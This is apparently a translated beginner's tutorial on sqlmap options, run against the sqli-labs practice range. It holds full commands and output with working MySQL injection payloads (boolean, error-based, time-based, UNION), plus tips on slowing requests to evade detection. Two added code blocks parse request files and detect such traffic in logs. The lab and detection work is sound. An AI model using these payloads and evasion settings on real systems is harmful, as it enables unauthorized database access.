
Sqlmap(1)

Reading the sqlmap manual, Zen-style (1)

--wizard: this option is perfect for a noob like me, and I really like it

Example: (every example in this post uses sqli-labs, an excellent practice range)

Just run sqlmap with --wizard and then answer its prompts with the relevant settings~

R:\deskTop\big_tools\sqlmap>python sqlmap.py --wizard
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:38:53 /2020-04-06/

[10:38:53] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.147.145:86/Less-1/?id=1
POST data (--data) [Enter for None]:

Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1

sqlmap is running, please wait..

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5144=5144 AND 'dolo'='dolo

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2132 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(2132=2132,1))),0x716a6b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jpxT'='jpxT

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6344 FROM (SELECT(SLEEP(5)))guSZ) AND 'ZPpD'='ZPpD

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8321' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627671,0x52436552544d545168525073794470557a4152735071694661766474426978636f74694d7448554f,0x716a6b7671)-- -
---
back-end DBMS: MySQL >= 5.0
banner: '5.1.73-community'
current user: 'root@localhost'
current database: 'security'
current user is DBA: True

[*] ending @ 10:39:15 /2020-04-06/

-u and -r

There are actually several others, like -m and -g, but I'm too much of a noob to have used them, so I won't mislead anyone

-u is followed directly by the URL; -r is followed by a file containing the raw HTTP request data

Let's look at -u first

Example:

-v controls how much output is shown; the default is 1. I chose 0 here because I don't want the output to take up as much space as it did in the example above.

--batch makes sqlmap fill in the default answer whenever it would ask what to do next. Say you need the toilet, but your machine is running sqlmap and you can't hold it any longer: add this option and go in peace.

R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-8/?id=1" -v 0  --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:03:46 /2020-04-06/

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9174=9174 AND 'ZbCb'='ZbCb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5751 FROM (SELECT(SLEEP(5)))afAO) AND 'qQtV'='qQtV
---
back-end DBMS: MySQL >= 5.0.12

[*] ending @ 11:08:20 /2020-04-06/

Now let's look at -r

First we need a file holding the HTTP request data. There are many ways to get one; being a noob, I only know how to use Burp

Request contents:

POST /Less-16/ HTTP/1.1
Host: 192.168.147.145:86
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.147.145:86/Less-16/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

uname=1&passwd=2&submit=Submit

Example:

Some explanation

--level sets the test level; the higher the level, the more test statements are used and the finer-grained they are.

--level=2 adds cookie injection

--level=3 adds User-Agent injection. In short, the higher the level, the more tests; the maximum is 5 and the default is 1

--risk has 3 levels, default 1. For time-based injection you can set it to 2; if you want OR statements included in the tests, choose 3. That can carry risk: if the target is an UPDATE statement, an OR may change the contents of the database

--threads sets the number of threads to start; this example was too slow, so I added it

--dbms tells sqlmap which kind of database the target runs. Mine is MySQL, so I specified it directly, which saves the time spent fingerprinting the database type; without this option you always see things like SQL Server and Oracle scroll past. But if you don't know the database type, better not use this option casually~

Why --level=2 and --risk=2 here? Because with the defaults I didn't get a result...

R:\deskTop\big_tools\sqlmap>python sqlmap.py -r "r:\desktop\test.txt" -v 0 --batch --level=2 --threads=10 --dbms=mysql --risk=2
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:06:52 /2020-04-06/

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] Y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 231 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT 7192 FROM (SELECT(SLEEP(5)))WuiI) AND ("Lynp"="Lynp&passwd=2&submit=Submit
---
[12:24:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
back-end DBMS: MySQL >= 5.0.12

[*] ending @ 12:25:51 /2020-04-06/

What does --data do?

The previous example submitted data via POST, but if you don't want to capture a request and just want to hand over a URL, sqlmap gets confused and doesn't know how to run. At that moment a seven-coloured cloud appears on the horizon and --data rides in on the wind.

Example:

Since this is still the same example as before and there's a cached session, the result pops out in a flash~

--param-del specifies the character that separates parameters. You can leave it out, but I'm a bit OCD.

R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-16/" --data="uname=1&passwd=2&submit=Submit" --param-del="&" --level=2 --risk=2 --threads=10 --dbms=mysql -v 0
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:20:21 /2020-04-06/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT 7347 FROM (SELECT(SLEEP(5)))phKj) AND ("hpDc"="hpDc&passwd=2&submit=Submit
---
back-end DBMS: MySQL >= 5.0.0

[*] ending @ 13:20:23 /2020-04-06/
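The -r file is nothing more than a raw HTTP request, and -u with --data/--param-del carries the same information. The added example below (my code, not part of the original post or of sqlmap) parses the Less-16 request captured above, checks that Content-Length agrees with the body, derives the equivalent -u/--data form, and lists which parts of the request get tested at each --level using only the level rules stated in this post.

```python
from urllib.parse import parse_qsl, urlsplit

# The Less-16 request captured above, reproduced here as one file body.
SAMPLE_REQUEST = (
    "POST /Less-16/ HTTP/1.1\r\n"
    "Host: 192.168.147.145:86\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30\r\n"
    "\r\n"
    "uname=1&passwd=2&submit=Submit"
)

def parse_request_file(text, scheme="http"):
    """Split a raw HTTP request (the file -r reads) into its parts."""
    # Accept CRLF or bare LF; headers end at the first blank line.
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    body = body.rstrip("\n")  # editors often append a newline the request never had
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "host" not in headers:
        raise ValueError("no Host header: the URL cannot be rebuilt from this file")
    url = f"{scheme}://{headers['host']}{target}"
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    params.update(parse_qsl(body, keep_blank_values=True))
    declared = headers.get("content-length")
    return {"method": method, "url": url, "headers": headers, "body": body,
            "params": params,                        # GET and POST parameters
            "length_ok": declared is None or int(declared) == len(body.encode())}

def equivalent_sqlmap_args(req):
    """The -u/--data/--param-del form of the same request, as used further down."""
    args = ["-u", req["url"]]
    if req["body"]:
        args += [f"--data={req['body']}", "--param-del=&"]
    return args

def injection_points(req, level=1):
    """Where sqlmap looks for injection at a given --level, per the rules above."""
    points = list(req["params"])                    # level 1: GET/POST parameters
    if level >= 2 and "cookie" in req["headers"]:
        points.append("Cookie")                     # level 2 adds the Cookie header
    if level >= 3 and "user-agent" in req["headers"]:
        points.append("User-Agent")                 # level 3 adds User-Agent
    return points
```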

--delay: why delay?

You'll need this option a lot of the time, because sqlmap has no delay by default: tell it to run and it just runs, sending requests nonstop. Make enough noise and you'll attract the dogs; without this option you may end up being chased around by them. Also, the value is given in seconds.

Example:

R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-2/?id=1" --delay=0.520 --batch -v 0
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:32:14 /2020-04-06/

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[13:32:44] [WARNING] time-based comparison requires larger statistical model, please wait............
[13:42:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
. (done)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5215=5215

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6645 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6645=6645,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 7283 FROM (SELECT(SLEEP(5)))nbsS)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5923 UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x7653766d71485154524a454f4a644366645153636643646862707575524b4479504f657a656e7376,0x716b6a6a71)-- -
---
back-end DBMS: MySQL >= 5.0

[*] ending @ 13:43:21 /2020-04-06/

If you see something like this:

[13:42:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)

Don't panic; hit Enter a few times and wait. It's not the tool's fault. Maybe the network is bad, or the impatient demon deep in the human heart is acting up

Along with delay come --timeout and --retries

The default timeout is 30 seconds; change it if that doesn't suit you

retries defaults to 3, meaning that after 3 timeouts without a connection it stops trying. If a girl turned you down 3 times, would you still go after her? Set it to whatever number feels right to you. (For the record, that's not my standard.)

Example:
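From the other side of the wire, that noise is exactly what a defender looks for. The following added example (mine, not from the post or from sqlmap) runs a small detector over constructed access-log lines: it flags the payload shapes that appear in the injection points reported above, sqlmap's default User-Agent string, and a burst of requests from one address, which is the pattern a --delay setting is meant to spread out.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

SIGNATURES = {  # payload shapes from the injection points sqlmap reported above
    "boolean": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "time": re.compile(r"SLEEP\(\d+\)", re.I),
    "union": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "error": re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.I)}
SQLMAP_UA = re.compile(r"^sqlmap/")   # default UA: "sqlmap/<version> (http://sqlmap.org)"
# Apache/nginx combined log format: ip, timestamp, request target, user agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')

def parse_line(line):
    """Return (ip, timestamp, decoded target, user agent) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, target, ua = m.groups()
    when = datetime.strptime(ts.split()[0], "%d/%b/%Y:%H:%M:%S")
    return ip, when, unquote_plus(target), ua  # decode %27, + etc. before matching

def analyse(lines, window_s=10, burst=5):
    """Per source IP: payload signatures seen, sqlmap UA seen, request burst seen."""
    seen = defaultdict(lambda: {"signatures": set(), "ua": False, "times": []})
    for rec in filter(None, map(parse_line, lines)):   # skip unparseable lines
        ip, when, target, ua = rec
        f = seen[ip]
        f["times"].append(when)
        f["ua"] |= bool(SQLMAP_UA.match(ua))
        f["signatures"].update(n for n, p in SIGNATURES.items() if p.search(target))
    out = {}
    for ip, f in seen.items():
        t = sorted(f["times"])   # burst: at least `burst` requests inside window_s seconds
        noisy = any((t[i + burst - 1] - t[i]).total_seconds() <= window_s
                    for i in range(len(t) - burst + 1))
        out[ip] = {"signatures": sorted(f["signatures"]), "sqlmap_ua": f["ua"], "burst": noisy}
    return out

def constructed_logs():
    """Constructed sample: one scanner burst against Less-1 plus one ordinary visitor."""
    line = '{ip} - - [06/Apr/2020:10:38:{s:02d} +0800] "GET {q} HTTP/1.1" 200 713 "-" "{ua}"'
    probes = ["/Less-1/?id=1%27+AND+5144%3D5144+AND+%27dolo%27%3D%27dolo",
              "/Less-1/?id=1%27+AND+%28SELECT+6344+FROM+%28SELECT%28SLEEP%285%29%29%29guSZ%29",
              "/Less-1/?id=-8321%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL--+-",
              "/Less-1/?id=1%27+AND+%28SELECT+COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29%29",
              "/Less-1/?id=1", "/Less-1/?id=2"]
    scanner = [line.format(ip="192.0.2.10", s=53 + i, q=q,
                           ua="sqlmap/1.4.4#stable (http://sqlmap.org)") for i, q in enumerate(probes)]
    return scanner + [line.format(ip="198.51.100.7", s=30, q="/Less-1/?id=1", ua="Mozilla/5.0")]
```

Signatures alone are easy to bypass with tamper scripts or a custom User-Agent, so the burst check is the one that survives cosmetic changes; it is also the one --delay is designed to defeat, which is why the two belong together.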

R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-2/?id=1" --batch -v 0 --timeout=2 --retries=1
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.4#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:48:54 /2020-04-06/

[13:48:57] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5215=5215

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6645 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6645=6645,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 7283 FROM (SELECT(SLEEP(5)))nbsS)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5923 UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x7653766d71485154524a454f4a644366645153636643646862707575524b4479504f657a656e7376,0x716b6a6a71)-- -
---
back-end DBMS: MySQL >= 5.0

[*] ending @ 13:48:58 /2020-04-06/

That's it for today...
